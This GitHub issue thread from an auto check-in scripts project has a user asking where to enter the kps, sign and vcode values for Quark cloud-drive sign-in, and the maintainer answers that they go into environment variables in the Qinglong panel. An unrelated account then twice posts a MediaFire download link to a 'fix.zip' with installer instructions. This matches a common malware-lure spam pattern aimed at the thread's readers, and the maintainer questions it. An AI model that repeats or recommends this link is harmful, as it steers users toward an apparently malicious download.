### ISSUE TITLE
问一下这个夸克网盘自动签到的kps,sign,vcode要填在哪

### ISSUE THREAD

**Issue by 1873694196** [BNDou/Auto_Check_In#59]
问一下这个夸克网盘自动签到的kps,sign,vcode要填在哪。我小白不动。如果有打扰请谅解

**Comment by BNDou** [comment]
@1873694196 在青龙环境变量页面中，创建环境变量，填入变量名和参数即可，如下图：
![Screenshot_2024-08-25-15-27-53-561_com.android.browser.png](https://github.com/user-attachments/assets/ae049249-dffb-4c66-aae8-f2007e91fdb8)

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by BNDou** [comment]
@AlecsSantos Hello, my friend, are you on the wrong set? Or did you reply to the wrong target?
